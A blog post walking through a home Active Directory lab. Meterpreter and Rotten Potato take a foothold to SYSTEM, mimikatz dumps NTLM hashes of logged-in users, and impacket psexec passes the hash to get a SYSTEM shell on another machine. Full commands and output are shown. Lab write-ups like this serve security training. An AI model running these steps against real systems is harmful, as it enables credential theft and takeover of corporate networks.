Road To DC Part 2 - A Poor Mans Guide

in #ctf7 years ago (edited)

Introduction

Road to DC focuses on compromising an Windows foothold in an Active Directory structure, then escalating and moving laterally until we've obtained access to the networks' Domain Controller.

There is no hints, and it may or may not be able to be done in multiple ways. The lab was designed to be as realistic as possible and Keep in mind I am not a professional, and if there are misinterpretations on my part, I'm doing my best to remember what I've learned over a few years of practice, some of which is vague.

Table of Contents

Recap

When I'd written part 1, I utilized a well known exploit known as CVE-2016-032. However, on reflection, since I was able to obtain access to the MSSQL service, I could have utilized Rotten Potato. Rotten Potato, as described here uses permissions of the service accounts to performs a complication Man-in-the-middle attack to obtain a NTLM hash, which we can then use to elevate ourselves to SYSTEM context.

The binary I've utilized that is most stable in my opinion, MSFRottenPotato. I've uploaded it and utilized the wonderful Meterpreter extension incognito to steal the process token and elevate my user context.

meterpreter > upload /root/ctfs/lkyslabs/binaries/MSFRottenPotato.exe
[*] uploading  : /root/ctfs/lkyslabs/binaries/MSFRottenPotato.exe -> MSFRottenPotato.exe
[*] Uploaded 340.50 KiB of 340.50 KiB (100.0%): /root/ctfs/lkyslabs/binaries/MSFRottenPotato.exe -> MSFRottenPotato.exe
[*] uploaded   : /root/ctfs/lkyslabs/binaries/MSFRottenPotato.exe -> MSFRottenPotato.exe
meterpreter > execute -f 'MSFRottenPotato.exe' -a '1 cmd.exe'
Process 2320 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT Service\MSSQL$MOBILEAPPDB

Impersonation Tokens Available
========================================
No tokens available

meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT AUTHORITY\SYSTEM
NT Service\MSSQL$MOBILEAPPDB

Impersonation Tokens Available
========================================
No tokens available

meterpreter > impersonate_token 'NT AUTHORITY\SYSTEM'
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter >

Its a bit more reliable then the other vector, as I before I was only able to perform it once beforehand. Either way will work, as both effect the current version and context of your user. On to post exploitation!

Post Exploitation

The general idea, as the name describes, is to perform renaissance on the target machine that may permit us to move across the domain. Generally in a red team scenario, we'd maintain a sense of covert-ness (butchered), however I'll get more into that in another upcoming lab.

First in foremost, I'll try to have a look at process's, and netstat, which may inform me of any other machines within the network who may be logged in, which I can then perhaps lift a hash using mimikatz.

Process listing returns some useful entries. Ive snipped the output a bit, as most if it was junk.

meterpreter > ps
--snip--
 Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
 2024  492   vmtoolsd.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2088  492   taskhost.exe          x64   10       BS\pcook                      C:\Windows\system32\taskhost.exe
 2360  492   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\sppsvc.exe
 2460  492   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE     C:\Windows\servicing\TrustedInstaller.exe
 2636  3484  mmc.exe               x64   10       BS\pcook                      
 --snip--

He doesnt appear to be logged in remotely, maybe netstat may reveal something?

merpreter > netstat
-- snip --
tcp    10.66.1.100:59962    45.63.65.64:5553   ESTABLISHED  0     0      1688/sqlservr.exe
tcp    172.16.100.17:3389   172.16.0.10:49315  ESTABLISHED  0     0      2460/svchost.exe
tcp    172.16.100.17:60304  172.16.200.43:22   TIME_WAIT    0     0      0/[System Process]
tcp    172.16.100.17:60305  172.16.200.43:22   TIME_WAIT    0     0      0/[System Process]
tcp    172.16.100.17:60306  172.16.200.43:22   TIME_WAIT    0     0      0/[System Process]
tcp    172.16.100.17:60307  172.16.200.43:22   TIME_WAIT    0     0      0/[System Process]
tcp    172.16.100.17:60308  172.16.200.43:22   TIME_WAIT    0     0      0/[System Process]
tcp    172.16.100.17:60309  172.16.200.43:22   TIME_WAIT    0     0      0/[System Process]
tcp    172.16.100.17:60310  172.16.200.43:22   TIME_WAIT    0     0      0/[System Process]
tcp    172.16.100.17:60311  172.16.200.43:22   TIME_WAIT    0     0      0/[System Process]
tcp    172.16.100.17:60312  172.16.200.43:22   TIME_WAIT    0     0      0/[System Process]

Perfect! We see that 172.16.0.10 is connected to our machine on port 3389, the Microsoft Remote Desktop Service port. With this in mind, and with our SYSTEM context, we can utilize a tool known as mimikatz to obtain an NTLM hash, and or any cached login credentials from LSASS.exe. Great tool.

A quick 'privilege::debug' and 'sekurlsa::msv' later, and we have an NTLM hash.

Authentication Id : 0 ; 2677242 (00000000:0028d9fa)
Session           : RemoteInteractive from 17
User Name         : rsanchez
Domain            : BS
Logon Server      : DC01
Logon Time        : 4/18/2018 6:17:00 PM
SID               : S-1-5-21-2465045178-3688936882-4255896025-1117
        msv :
         [00000003] Primary
         * Username : rsanchez
         * Domain   : BS
         * NTLM     : a76598aa72baadc5fa88200a58bf45df
         * SHA1     : 97fef000aaaa87db884b2ac02c79974b5dea2f7d
         [00010000] CredentialKeys
         * NTLM     : a76598aa72baadc5fa88200a58bf45df
         * SHA1     : 97fef000aaaa87db884b2ac02c79974b5dea2f7d

--snip--
Authentication Id : 0 ; 79018 (00000000:000134aa)
Session           : Batch from 0
User Name         : pcook
Domain            : BS
Logon Server      : DC01
Logon Time        : 4/18/2018 3:27:53 PM
SID               : S-1-5-21-2465045178-3688936882-4255896025-1113
        msv :
         [00010000] CredentialKeys
         * NTLM     : 5239d9d7ada4f070e310dbf0cba28a55
         * SHA1     : 874f89ecbfd7da3b6e0c51073222589c97cdf757
         [00000003] Primary
         * Username : pcook
         * Domain   : BS
         * NTLM     : 5239d9d7ada4f070e310dbf0cba28a55
         * SHA1     : 874f89ecbfd7da3b6e0c51073222589c97cdf757

From there, we can setup a SOCKS4 listener on our box and pivot back to ourselves with a more proper shell. I'll leave the socks setup to you. its fairly straight forward in Metasploit. In my case, I'll perform a technique known as Pass-The-Hash, with utilizes NTLM authentication, making passwords in Windows redudant. GG Bill gates.

Some programs do require the LM hash. If so, just put a blank one aad3b435b51404eeaad3b435b51404ee:NTHASH, as it bypasses the need.

root@kali:~/ctfs/rootme/bluebox# proxychains psexec.py [email protected] -hashes :a76598aa72baadc5fa88200a58bf45df
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies

[*] Requesting shares on 172.16.0.10.....
[*] Found writable share ADMIN$
[*] Uploading file uRXKpDVM.exe
[*] Opening SVCManager on 172.16.0.10.....
[*] Creating service OJWq on 172.16.0.10.....
[*] Starting service OJWq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd /

wC:\>hoami
nt authority\system

C:\>

Summary

And we're done!. Essentially this is a simple guide on exploiting functionalities in windows, manually or automated, to then compromise a foothold, and pivot to the DC. All this is very simple, however in a more realistic environment, this may not be common. Most of them are far more locked down then this. I'll look more into a more practical setup provided to be my Lky soon.

any questions, hit me up in a DM at http://twitter.com/lovinghackers. Looking for graphic design? Check out @beepboopdesign

Coin Marketplace

STEEM 0.22
TRX 0.25
JST 0.039
BTC 105709.66
ETH 3341.43
SBD 4.12